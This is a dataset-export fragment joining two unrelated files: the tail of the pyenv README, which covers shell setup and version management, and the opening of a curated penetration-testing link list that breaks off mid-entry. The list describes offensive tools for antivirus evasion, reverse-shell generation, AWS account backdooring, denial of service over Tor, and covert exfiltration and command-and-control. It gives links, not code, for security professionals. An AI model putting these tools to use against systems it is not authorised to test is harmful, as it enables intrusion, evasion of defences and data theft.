PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.bashrc\n echo 'eval \"$(pyenv init -)\"' >> ~/.bashrc\n ~~~\n\n Then, if you have `~/.profile`, `~/.bash_profile` or `~/.bash_login`, add the commands there as well.\n If you have none of these, add them to `~/.profile`.\n\n * to add to `~/.profile`:\n ~~~ bash\n echo 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.profile\n echo 'command -v pyenv >/dev/null || export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.profile\n echo 'eval \"$(pyenv init -)\"' >> ~/.profile\n ~~~\n\n * to add to `~/.bash_profile`:\n ~~~ bash\n echo 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.bash_profile\n echo 'command -v pyenv >/dev/null || export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.bash_profile\n echo 'eval \"$(pyenv init -)\"' >> ~/.bash_profile\n ~~~\n\n - For **Zsh**:\n ~~~ zsh\n echo 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.zshrc\n echo 'command -v pyenv >/dev/null || export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.zshrc\n echo 'eval \"$(pyenv init -)\"' >> ~/.zshrc\n ~~~\n\n If you wish to get Pyenv in noninteractive login shells as well, also add the commands to `~/.zprofile` or `~/.zlogin`.\n\n - For **Fish shell**:\n\n If you have Fish 3.2.0 or newer, execute this interactively:\n\n ~~~ fish\n set -Ux PYENV_ROOT $HOME/.pyenv\n fish_add_path $PYENV_ROOT/bin\n ~~~\n\n Otherwise, execute the snippet below:\n\n ~~~ fish\n set -Ux PYENV_ROOT $HOME/.pyenv\n set -U fish_user_paths $PYENV_ROOT/bin $fish_user_paths\n ~~~\n\n Now, add this to `~/.config/fish/config.fish`:\n\n ~~~ fish\n pyenv init - | source\n ~~~\n\n **Bash warning**: There are some systems where the `BASH_ENV` variable is configured\n to point to `.bashrc`. On such systems, you should almost certainly put the\n `eval \"$(pyenv init -)\"` line into `.bash_profile`, and **not** into `.bashrc`. Otherwise, you\n may observe strange behaviour, such as `pyenv` getting into an infinite loop.\n See [#264](https://github.com/pyenv/pyenv/issues/264) for details.\n\n **Proxy note**: If you use a proxy, export `http_proxy` and `https_proxy`, too.\n\n In MacOS, you might also want to install [Fig](https://fig.io/) which\nprovides alternative shell completions for many command line tools with an\nIDE-like popup interface in the terminal window.\n(Note that their completions are independent from Pyenv's codebase\nso they might be slightly out of sync for bleeding-edge interface changes.)\n\n### Restart your shell\n\n for the `PATH` changes to take effect.\n\n ```sh\n exec \"$SHELL\"\n ```\n\n### Install Python build dependencies\n\n [**Install Python build dependencies**](https://github.com/pyenv/pyenv/wiki#suggested-build-environment)\n before attempting to install a new Python version.\n\n You can now begin using Pyenv.\n\n----\n\n\n## Usage\n\n### Install additional Python versions\n\nTo install additional Python versions, use [`pyenv install`](COMMANDS.md#pyenv-install).\n\nFor example, to download and install Python 3.10.4, run:\n\n```sh\npyenv install 3.10.4\n```\n\nRunning `pyenv install -l` gives the list of all available versions.\n\n**NOTE:** Most Pyenv-provided Python releases are source releases and are built\nfrom source as part of installation (that's why you need Python build dependencies preinstalled).\nYou can pass options to Python's `configure` and compiler flags to customize the build,\nsee [_Special environment variables_ in Python-Build's README](plugins/python-build/README.md#special-environment-variables)\nfor details.\n\n**NOTE:** If you are having trouble installing a Python version,\nplease visit the wiki page about\n[Common Build Problems](https://github.com/pyenv/pyenv/wiki/Common-build-problems).\n\n**NOTE:** If you want to use proxy for download, please set the `http_proxy` and `https_proxy`\nenvironment variables.\n\n**NOTE:** If you'd like a faster interpreter at the cost of longer build times,\nsee [_Building for maximum performance_ in Python-Build's README](plugins/python-build/README.md#building-for-maximum-performance).\n\n\n#### Prefix auto-resolution to the latest version\n\nAll Pyenv subcommands except `uninstall` automatically resolve full prefixes to the latest version in the corresponding version line.\n\n`pyenv install` picks the latest known version, while other subcommands pick the latest installed version.\n\nE.g. to install and then switch to the latest 3.10 release:\n\n```sh\npyenv install 3.10\npyenv global 3.10\n```\n\nYou can run [`pyenv latest -k `](COMMANDS.md#pyenv-latest) to see how `pyenv install` would resolve a specific prefix, or [`pyenv latest `](COMMANDS.md#pyenv-latest) to see how other subcommands would resolve it.\n\nSee the [`pyenv latest` documentation](COMMANDS.md#pyenv-latest) for details.\n\n\n#### Python versions with extended support\n\nFor the following Python releases, Pyenv applies user-provided patches that add support for some newer environments.\nThough we don't actively maintain those patches, since existing releases never change,\nit's safe to assume that they will continue working until there are further incompatible changes\nin a later version of those environments.\n\n* *3.7.8-3.7.15, 3.8.4-3.8.12, 3.9.0-3.9.7* : XCode 13.3\n* *3.5.10, 3.6.15* : MacOS 11+ and XCode 13.3\n* *2.7.18* : MacOS 10.15+ and Apple Silicon\n\n\n### Switch between Python versions\n\nTo select a Pyenv-installed Python as the version to use, run one\nof the following commands:\n\n* [`pyenv shell `](COMMANDS.md#pyenv-shell) -- select just for current shell session\n* [`pyenv local `](COMMANDS.md#pyenv-local) -- automatically select whenever you are in the current directory (or its subdirectories)\n* [`pyenv global `](COMMANDS.md#pyenv-shell) -- select globally for your user account\n\nE.g. to select the above-mentioned newly-installed Python 3.10.4 as your preferred version to use:\n\n~~~bash\npyenv global 3.10.4\n~~~\n\nNow whenever you invoke `python`, `pip` etc., an executable from the Pyenv-provided\n3.10.4 installation will be run instead of the system Python.\n\nUsing \"`system`\" as a version name would reset the selection to your system-provided Python.\n\nSee [Understanding shims](#understanding-shims) and\n[Understanding Python version selection](#understanding-python-version-selection)\nfor more details on how the selection works and more information on its usage.\n\n\n### Uninstall Python versions\n\nAs time goes on, you will accumulate Python versions in your\n`$(pyenv root)/versions` directory.\n\nTo remove old Python versions, use [`pyenv uninstall `](COMMANDS.md#pyenv-uninstall).\n\nAlternatively, you can simply `rm -rf` the directory of the version you want\nto remove. You can find the directory of a particular Python version\nwith the `pyenv prefix` command, e.g. `pyenv prefix 2.6.8`.\nNote however that plugins may run additional operations on uninstall\nwhich you would need to do by hand as well. E.g. Pyenv-Virtualenv also\nremoves any virtual environments linked to the version being uninstalled.\n\n\n### Other operations\n\nRun `pyenv commands` to get a list of all available subcommands.\nRun a subcommand with `--help` to get help on it, or see the [Commands Reference](COMMANDS.md).\n\nNote that Pyenv plugins that you install may add their own subcommands.\n\n\n## Upgrading\n\n### Upgrading with Homebrew\n\nIf you've installed Pyenv using Homebrew, upgrade using:\n```sh\nbrew upgrade pyenv\n```\n\nTo switch from a release to the latest development version of Pyenv, use:\n\n```sh\nbrew uninstall pyenv\nbrew install pyenv --head\n```\n\nthen you can upgrade it with `brew upgrade pyenv` as usual.\n\n\n### Upgrading with Installer or Git checkout\n\nIf you've installed Pyenv with Pyenv-installer, you likely have the\n[Pyenv-Update](https://github.com/pyenv/pyenv-update) plugin that would\nupgrade Pyenv and all installed plugins:\n\n```sh\npyenv update\n```\n\nIf you've installed Pyenv using Pyenv-installer or Git checkout, you can also\nupgrade your installation at any time using Git.\n\nTo upgrade to the latest development version of pyenv, use `git pull`:\n\n```sh\ncd $(pyenv root)\ngit pull\n```\n\nTo upgrade to a specific release of Pyenv, check out the corresponding tag:\n\n```sh\ncd $(pyenv root)\ngit fetch\ngit tag\ngit checkout v0.1.0\n```\n\n## Uninstalling pyenv\n\nThe simplicity of pyenv makes it easy to temporarily disable it, or\nuninstall from the system.\n\n1. To **disable** Pyenv managing your Python versions, simply remove the\n `pyenv init` invocations from your shell startup configuration. This will\n remove Pyenv shims directory from `PATH`, and future invocations like\n `python` will execute the system Python version, as it was before Pyenv.\n\n `pyenv` will still be accessible on the command line, but your Python\n apps won't be affected by version switching.\n\n2. To completely **uninstall** Pyenv, remove _all_ Pyenv configuration lines\n from your shell startup configuration, and then remove\n its root directory. This will **delete all Python versions** that were\n installed under the `` $(pyenv root)/versions/ `` directory:\n\n ```sh\n rm -rf $(pyenv root)\n ```\n\n If you've installed Pyenv using a package manager, as a final step,\n perform the Pyenv package removal. For instance, for Homebrew:\n\n ```\n brew uninstall pyenv\n ```\n\n\n## Pyenv plugins\n\nPyenv provides a simple, flexible and maintainable way to extend and customize its functionalty with plugins --\nas simple as creating a plugin directory and dropping a shell script on a certain subpath of it\nwith whatever extra logic you need to be run at certain moments.\n\nSee [_Plugins_ on the wiki](https://github.com/pyenv/pyenv/wiki/Plugins) on how to install and use plugins\nas well as a catalog of some useful existing plugins for common needs.\n\nSee [_Authoring plugins_ on the wiki](https://github.com/pyenv/pyenv/wiki/Authoring-plugins) on writing your own plugins.\n\n\n## Advanced Configuration\n\nSkip this section unless you must know what every line in your shell\nprofile is doing.\n\nAlso see the [Environment variables](#environment-variables) section\nfor the environment variables that control Pyenv's behavior.\n\n`pyenv init` is the only command that crosses the line of loading\nextra commands into your shell. Coming from RVM, some of you might be\nopposed to this idea. Here's what `eval \"$(pyenv init -)\"` actually does:\n\n\n1. **Sets up the shims path.** This is what allows Pyenv to intercept\n and redirect invocations of `python`, `pip` etc. transparently.\n It prepends `$(pyenv root)/shims` to your `$PATH`.\n It also deletes any other instances of `$(pyenv root)/shims` on `PATH`\n which allows to invoke `eval \"$(pyenv init -)\"` multiple times without\n getting duplicate `PATH` entries.\n\n2. **Installs autocompletion.** This is entirely optional but pretty\n useful. Sourcing `$(pyenv root)/completions/pyenv.bash` will set that\n up. There are also completions for Zsh and Fish.\n\n3. **Rehashes shims.** From time to time you'll need to rebuild your\n shim files. Doing this on init makes sure everything is up to\n date. You can always run `pyenv rehash` manually.\n\n4. **Installs `pyenv` into the current shell as a shell function.**\n This bit is also optional, but allows\n pyenv and plugins to change variables in your current shell.\n This is required for some commands like `pyenv shell` to work.\n The sh dispatcher doesn't do\n anything crazy like override `cd` or hack your shell prompt, but if\n for some reason you need `pyenv` to be a real script rather than a\n shell function, you can safely skip it.\n\n`eval \"$(pyenv init --path)\"` only does items 1 and 3.\n\nTo see exactly what happens under the hood for yourself, run `pyenv init -`\nor `pyenv init --path`.\n\n`eval \"$(pyenv init -)\"` is supposed to run at any interactive shell's\nstartup (including nested shells -- e.g. those invoked from editors)\nso that you get completion and convenience shell functions.\n\n`eval \"$(pyenv init --path)\"` can be used instead of `eval \"$(pyenv init -)\"`\nto just enable shims, without shell integration. It can also be used to bump shims\nto the front of `PATH` after some other logic has prepended stuff to `PATH`\nthat may shadow Pyenv's shims.\n\n* In particular, in Debian-based distributions, the stock `~/.profile`\n prepends per-user `bin` directories to `PATH` after having sourced `~/.bashrc`.\n This necessitates appending a `pyenv init` call to `~/.profile` as well as `~/.bashrc`\n in these distributions because the system's Pip places executables for\n modules installed by a non-root user into those per-user `bin` directories.\n\n\n### Using Pyenv without shims\n\nIf you don't want to use `pyenv init` and shims, you can still benefit\nfrom pyenv's ability to install Python versions for you. Just run\n`pyenv install` and you will find versions installed in\n`$(pyenv root)/versions`.\n\nYou can manually execute or symlink them as required,\nor you can use [`pyenv exec `](COMMANDS.md#pyenv-exec)\nwhenever you want `` to be affected by Pyenv's version selection\nas currently configured.\n\n`pyenv exec` works by prepending `$(pyenv root)/versions//bin`\nto `PATH` in the ``'s environment, the same as what e.g. RVM does.\n\n\n### Environment variables\n\nYou can affect how Pyenv operates with the following environment variables:\n\nname | default | description\n-----|---------|------------\n`PYENV_VERSION` | | Specifies the Python version to be used.
Also see [`pyenv shell`](COMMANDS.md#pyenv-shell)\n`PYENV_ROOT` | `~/.pyenv` | Defines the directory under which Python versions and shims reside.
Also see [`pyenv root`](COMMANDS.md#pyenv-root)\n`PYENV_DEBUG` | | Outputs debug information.
Also as: `pyenv --debug `\n`PYENV_HOOK_PATH` | [_see wiki_][hooks] | Colon-separated list of paths searched for pyenv hooks.\n`PYENV_DIR` | `$PWD` | Directory to start searching for `.python-version` files.\n`PYTHON_BUILD_ARIA2_OPTS` | | Used to pass additional parameters to [`aria2`](https://aria2.github.io/).
If the `aria2c` binary is available on `PATH`, pyenv uses `aria2c` instead of `curl` or `wget` to download the Python Source code. If you have an unstable internet connection, you can use this variable to instruct `aria2` to accelerate the download.
In most cases, you will only need to use `-x 10 -k 1M` as value to `PYTHON_BUILD_ARIA2_OPTS` environment variable\n\nSee also [_Special environment variables_ in Python-Build's README](plugins/python-build/README.md#special-environment-variables)\nfor environment variables that can be used to customize the build.\n\n----\n\n## Development\n\nThe pyenv source code is [hosted on\nGitHub](https://github.com/pyenv/pyenv). It's clean, modular,\nand easy to understand, even if you're not a shell hacker.\n\nTests are executed using [Bats](https://github.com/bats-core/bats-core):\n\n bats test\n bats/test/.bats\n\n\n### Contributing\n\nFeel free to submit pull requests and file bugs on the [issue\ntracker](https://github.com/pyenv/pyenv/issues).\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md) for more details on submitting changes.\n\n\n### Version History\n\nSee [CHANGELOG.md](CHANGELOG.md).\n\n\n### License\n\n[The MIT License](LICENSE)\n\n\n[pyenv-virtualenv]: https://github.com/pyenv/pyenv-virtualenv#readme\n[hooks]: https://github.com/pyenv/pyenv/wiki/Authoring-plugins#pyenv-hooks\n"}}},{"rowIdx":534,"cells":{"text":{"kind":"string","value":"# Awesome Penetration Testing [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re)\n\n> A collection of awesome penetration testing and offensive cybersecurity resources.\n\n[Penetration testing](https://en.wikipedia.org/wiki/Penetration_test) is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities. Should you discover a vulnerability, please follow [this guidance](https://kb.cert.org/vuls/guidance/) to report it responsibly.\n\nYour contributions and suggestions are heartily♥ welcome. (✿◕‿◕). Please check the [Contributing Guidelines](CONTRIBUTING.md) for more details. This work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).\n\n[This project is supported by Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_content=awesome+penetration+testing&utm_medium=referral&utm_campaign=generic+advert)\n\n## Contents\n\n* [Android Utilities](#android-utilities)\n* [Anonymity Tools](#anonymity-tools)\n * [Tor Tools](#tor-tools)\n* [Anti-virus Evasion Tools](#anti-virus-evasion-tools)\n* [Books](#books)\n * [Malware Analysis Books](#malware-analysis-books)\n* [CTF Tools](#ctf-tools)\n* [Cloud Platform Attack Tools](#cloud-platform-attack-tools)\n* [Collaboration Tools](#collaboration-tools)\n* [Conferences and Events](#conferences-and-events)\n * [Asia](#asia)\n * [Europe](#europe)\n * [North America](#north-america)\n * [South America](#south-america)\n * [Zealandia](#zealandia)\n* [Exfiltration Tools](#exfiltration-tools)\n* [Exploit Development Tools](#exploit-development-tools)\n* [File Format Analysis Tools](#file-format-analysis-tools)\n* [GNU/Linux Utilities](#gnulinux-utilities)\n* [Hash Cracking Tools](#hash-cracking-tools)\n* [Hex Editors](#hex-editors)\n* [Industrial Control and SCADA Systems](#industrial-control-and-scada-systems)\n* [Intentionally Vulnerable Systems](#intentionally-vulnerable-systems)\n * [Intentionally Vulnerable Systems as Docker Containers](#intentionally-vulnerable-systems-as-docker-containers)\n* [Lock Picking](#lock-picking)\n* [macOS Utilities](#macos-utilities)\n* [Multi-paradigm Frameworks](#multi-paradigm-frameworks)\n* [Network Tools](#network-tools)\n * [DDoS Tools](#ddos-tools)\n * [Network Reconnaissance Tools](#network-reconnaissance-tools)\n * [Protocol Analyzers and Sniffers](#protocol-analyzers-and-sniffers)\n * [Network Traffic Replay and Editing Tools](#network-traffic-replay-and-editing-tools)\n * [Proxies and Machine-in-the-Middle (MITM) Tools](#proxies-and-machine-in-the-middle-mitm-tools)\n * [Transport Layer Security Tools](#transport-layer-security-tools)\n * [Wireless Network Tools](#wireless-network-tools)\n* [Network Vulnerability Scanners](#network-vulnerability-scanners)\n * [Web Vulnerability Scanners](#web-vulnerability-scanners)\n* [Open Sources Intelligence (OSINT)](#open-sources-intelligence-osint)\n * [Data broker and search engine services](#data-broker-and-search-engine-services)\n * [Dorking tools](#dorking-tools)\n * [Email search and analysis tools](#email-search-and-analysis-tools)\n * [Metadata harvesting and analysis](#metadata-harvesting-and-analysis)\n * [Network device discovery tools](#network-device-discovery-tools)\n * [OSINT Online Resources](#osint-online-resources)\n * [Source code repository searching tools](#source-code-repository-searching-tools)\n * [Web application and resource analysis tools](#web-application-and-resource-analysis-tools)\n* [Online Resources](#online-resources)\n * [Online Code Samples and Examples](#online-code-samples-and-examples)\n * [Online Exploit Development Resources](#online-exploit-development-resources)\n * [Online Lock Picking Resources](#online-lock-picking-resources)\n * [Online Operating Systems Resources](#online-operating-systems-resources)\n * [Online Penetration Testing Resources](#online-penetration-testing-resources)\n * [Other Lists Online](#other-lists-online)\n * [Penetration Testing Report Templates](#penetration-testing-report-templates)\n* [Operating System Distributions](#operating-system-distributions)\n* [Periodicals](#periodicals)\n* [Physical Access Tools](#physical-access-tools)\n* [Privilege Escalation Tools](#privilege-escalation-tools)\n * [Password Spraying Tools](#password-spraying-tools)\n* [Reverse Engineering](#reverse-engineering)\n * [Reverse Engineering Books](#reverse-engineering-books)\n * [Reverse Engineering Tools](#reverse-engineering-tools)\n* [Security Education Courses](#security-education-courses)\n* [Shellcoding Guides and Tutorials](#exploit-development-online-resources)\n* [Side-channel Tools](#side-channel-tools)\n* [Social Engineering](#social-engineering)\n * [Social Engineering Books](#social-engineering-books)\n * [Social Engineering Online Resources](#social-engineering-online-resources)\n * [Social Engineering Tools](#social-engineering-tools)\n* [Static Analyzers](#static-analyzers)\n* [Steganography Tools](#steganography-tools)\n* [Vulnerability Databases](#vulnerability-databases)\n* [Web Exploitation](#web-exploitation)\n * [Intercepting Web proxies](#intercepting-web-proxies)\n * [Web file inclusion tools](#web-file-inclusion-tools)\n * [Web injection tools](#web-injection-tools)\n * [Web path discovery and bruteforcing tools](#web-path-discovery-and-bruteforcing-tools)\n * [Web shells and C2 frameworks](#web-shells-and-c2-frameworks)\n * [Web-accessible source code ripping tools](#web-accessible-source-code-ripping-tools)\n * [Web Exploitation Books](#web-exploitation-books)\n* [Windows Utilities](#windows-utilities)\n\n## Android Utilities\n\n* [cSploit](https://www.csploit.org/) - Advanced IT security professional toolkit on Android featuring an integrated Metasploit daemon and MITM capabilities.\n* [Fing](https://www.fing.com/products/fing-app/) - Network scanning and host enumeration app that performs NetBIOS, UPnP, Bonjour, SNMP, and various other advanced device fingerprinting techniques.\n\n## Anonymity Tools\n\n* [I2P](https://geti2p.net/) - The Invisible Internet Project.\n* [Metadata Anonymization Toolkit (MAT)](https://0xacab.org/jvoisin/mat2) - Metadata removal tool, supporting a wide range of commonly used file formats, written in Python3.\n* [What Every Browser Knows About You](http://webkay.robinlinus.com/) - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.\n\n### Tor Tools\n\nSee also [awesome-tor](https://github.com/ajvb/awesome-tor).\n\n* [Nipe](https://github.com/GouveaHeitor/nipe) - Script to redirect all traffic from the machine to the Tor network.\n* [OnionScan](https://onionscan.org/) - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.\n* [Tails](https://tails.boum.org/) - Live operating system aiming to preserve your privacy and anonymity.\n* [Tor](https://www.torproject.org/) - Free software and onion routed overlay network that helps you defend against traffic analysis.\n* [dos-over-tor](https://github.com/skizap/dos-over-tor) - Proof of concept denial of service over Tor stress test tool.\n* [kalitorify](https://github.com/brainfuckSec/kalitorify) - Transparent proxy through Tor for Kali Linux OS.\n\n## Anti-virus Evasion Tools\n\n* [AntiVirus Evasion Tool (AVET)](https://github.com/govolution/avet) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.\n* [CarbonCopy](https://github.com/paranoidninja/CarbonCopy) - Tool that creates a spoofed certificate of any online website and signs an Executable for AV evasion.\n* [Hyperion](http://nullsecurity.net/tools/binary.html) - Runtime encryptor for 32-bit portable executables (\"PE `.exe`s\").\n* [Shellter](https://www.shellterproject.com/) - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.\n* [UniByAv](https://github.com/Mr-Un1k0d3r/UniByAv) - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.\n* [Veil](https://www.veil-framework.com/) - Generate metasploit payloads that bypass common anti-virus solutions.\n* [peCloakCapstone](https://github.com/v-p-b/peCloakCapstone) - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.\n\n## Books\n\nSee also [DEF CON Suggested Reading](https://www.defcon.org/html/links/book-list.html).\n\n* [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)\n* [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)\n* [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362)\n* [Android Hacker's Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)\n* [BTFM: Blue Team Field Manual by Alan J White & Ben Clark, 2017](https://www.amazon.de/Blue-Team-Field-Manual-BTFM/dp/154101636X)\n* [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)\n* [Bug Hunter's Diary by Tobias Klein, 2011](https://nostarch.com/bughunter)\n* [Car Hacker's Handbook by Craig Smith, 2016](https://nostarch.com/carhacking)\n* [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/)\n* [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://nostarch.com/metasploit)\n* [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://nostarch.com/pentesting)\n* [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677)\n* [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4)\n* [RTFM: Red Team Field Manual by Ben Clark, 2014](http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/)\n* [The Art of Exploitation by Jon Erickson, 2008](https://nostarch.com/hacking2.htm)\n* [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1)\n* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)\n* [The Hacker Playbook by Peter Kim, 2014](http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/)\n* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)\n* [The Mobile Application Hacker's Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)\n* [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE)\n* [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6)\n* [iOS Hacker's Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)\n\n### Malware Analysis Books\n\nSee [awesome-malware-analysis § Books](https://github.com/rshipp/awesome-malware-analysis#books).\n\n## CTF Tools\n\n* [CTF Field Guide](https://trailofbits.github.io/ctf/) - Everything you need to win your next CTF competition.\n* [Ciphey](https://github.com/ciphey/ciphey) - Automated decryption tool using artificial intelligence and natural language processing.\n* [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) - Decrypt data enciphered using weak RSA keys, and recover private keys from public keys using a variety of automated attacks.\n* [ctf-tools](https://github.com/zardus/ctf-tools) - Collection of setup scripts to install various security research tools easily and quickly deployable to new machines.\n* [shellpop](https://github.com/0x00-0x00/shellpop) - Easily generate sophisticated reverse or bind shell commands to help you save time during penetration tests.\n\n## Cloud Platform Attack Tools\n\nSee also *[HackingThe.cloud](https://hackingthe.cloud/)*.\n\n* [Cloud Container Attack Tool (CCAT)](https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/) - Tool for testing security of container environments.\n* [CloudHunter](https://github.com/belane/CloudHunter) - Looks for AWS, Azure and Google cloud storage buckets and lists permissions for vulnerable buckets.\n* [Cloudsplaining](https://cloudsplaining.readthedocs.io/) - Identifies violations of least privilege in AWS IAM policies and generates a pretty HTML report with a triage worksheet.\n* [Endgame](https://endgame.readthedocs.io/) - AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account.\n* [GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - Script to enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated.\n\n## Collaboration Tools\n\n* [Dradis](https://dradisframework.com) - Open-source reporting and collaboration tool for IT security professionals.\n* [Lair](https://github.com/lair-framework/lair/wiki) - Reactive attack collaboration framework and web application built with meteor.\n* [Pentest Collaboration Framework (PCF)](https://gitlab.com/invuls/pentest-projects/pcf) - Open source, cross-platform, and portable toolkit for automating routine pentest processes with a team.\n* [Reconmap](https://reconmap.org/) - Open-source collaboration platform for InfoSec professionals that streamlines the pentest process.\n* [RedELK](https://github.com/outflanknl/RedELK) - Track and alarm about Blue Team activities while providing better usability in long term offensive operations.\n\n## Conferences and Events\n\n* [BSides](http://www.securitybsides.com/) - Framework for organising and holding security conferences.\n* [CTFTime.org](https://ctftime.org/) - Directory of upcoming and archive of past Capture The Flag (CTF) competitions with links to challenge writeups.\n\n### Asia\n\n* [HITB](https://conference.hitb.org/) - Deep-knowledge security conference held in Malaysia and The Netherlands.\n* [HITCON](https://hitcon.org/) - Hacks In Taiwan Conference held in Taiwan.\n* [Nullcon](http://nullcon.net/website/) - Annual conference in Delhi and Goa, India.\n* [SECUINSIDE](http://secuinside.com) - Security Conference in Seoul.\n\n### Europe\n\n* [44Con](https://44con.com/) - Annual Security Conference held in London.\n* [BalCCon](https://www.balccon.org) - Balkan Computer Congress, annually held in Novi Sad, Serbia.\n* [BruCON](http://brucon.org) - Annual security conference in Belgium.\n* [CCC](https://events.ccc.de/congress/) - Annual meeting of the international hacker scene in Germany.\n* [DeepSec](https://deepsec.net/) - Security Conference in Vienna, Austria.\n* [DefCamp](http://def.camp/) - Largest Security Conference in Eastern Europe, held annually in Bucharest, Romania.\n* [FSec](http://fsec.foi.hr) - FSec - Croatian Information Security Gathering in Varaždin, Croatia.\n* [Hack.lu](https://hack.lu/) - Annual conference held in Luxembourg.\n* [Infosecurity Europe](http://www.infosecurityeurope.com/) - Europe's number one information security event, held in London, UK.\n* [SteelCon](https://www.steelcon.info/) - Security conference in Sheffield UK.\n* [Swiss Cyber Storm](https://www.swisscyberstorm.com/) - Annual security conference in Lucerne, Switzerland.\n* [Troopers](https://www.troopers.de) - Annual international IT Security event with workshops held in Heidelberg, Germany.\n* [HoneyCON](https://honeycon.eu/) - Annual Security Conference in Guadalajara, Spain. Organized by the HoneySEC association.\n\n### North America\n\n* [AppSecUSA](https://appsecusa.org/) - Annual conference organized by OWASP.\n* [Black Hat](http://www.blackhat.com/) - Annual security conference in Las Vegas.\n* [CarolinaCon](https://carolinacon.org/) - Infosec conference, held annually in North Carolina.\n* [DEF CON](https://www.defcon.org/) - Annual hacker convention in Las Vegas.\n* [DerbyCon](https://www.derbycon.com/) - Annual hacker conference based in Louisville.\n* [Hackers Next Door](https://hnd.techlearningcollective.com/) - Cybersecurity and social technology conference held in New York City.\n* [Hackers On Planet Earth (HOPE)](https://hope.net/) - Semi-annual conference held in New York City.\n* [Hackfest](https://hackfest.ca) - Largest hacking conference in Canada.\n* [LayerOne](http://www.layerone.org/) - Annual US security conference held every spring in Los Angeles.\n* [National Cyber Summit](https://www.nationalcybersummit.com/) - Annual US security conference and Capture the Flag event, held in Huntsville, Alabama, USA.\n* [PhreakNIC](http://phreaknic.info/) - Technology conference held annually in middle Tennessee.\n* [RSA Conference USA](https://www.rsaconference.com/) - Annual security conference in San Francisco, California, USA.\n* [ShmooCon](http://shmoocon.org/) - Annual US East coast hacker convention.\n* [SkyDogCon](http://www.skydogcon.com/) - Technology conference in Nashville.\n* [SummerCon](https://www.summercon.org/) - One of the oldest hacker conventions in America, held during Summer.\n* [ThotCon](http://thotcon.org/) - Annual US hacker conference held in Chicago.\n* [Virus Bulletin Conference](https://www.virusbulletin.com/conference/index) - Annual conference going to be held in Denver, USA for 2016.\n\n### South America\n\n* [Ekoparty](http://www.ekoparty.org) - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina.\n* [Hackers to Hackers Conference (H2HC)](https://www.h2hc.com.br/) - Oldest security research (hacking) conference in Latin America and one of the oldest ones still active in the world.\n\n### Zealandia\n\n* [CHCon](https://chcon.nz) - Christchurch Hacker Con, Only South Island of New Zealand hacker con.\n\n## Exfiltration Tools\n\n* [DET](https://github.com/sensepost/DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.\n* [Iodine](https://code.kryo.se/iodine/) - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.\n* [TrevorC2](https://github.com/trustedsec/trevorc2) - Client/server tool for masking command and control and data exfiltration through a normally browsable website, not typical HTTP POST requests.\n* [dnscat2](https://github.com/iagox86/dnscat2) - Tool designed to create an encrypted command and control channel over the DNS protocol, which is an effective tunnel out of almost every network.\n* [pwnat](https://github.com/samyk/pwnat) - Punches holes in firewalls and NATs.\n* 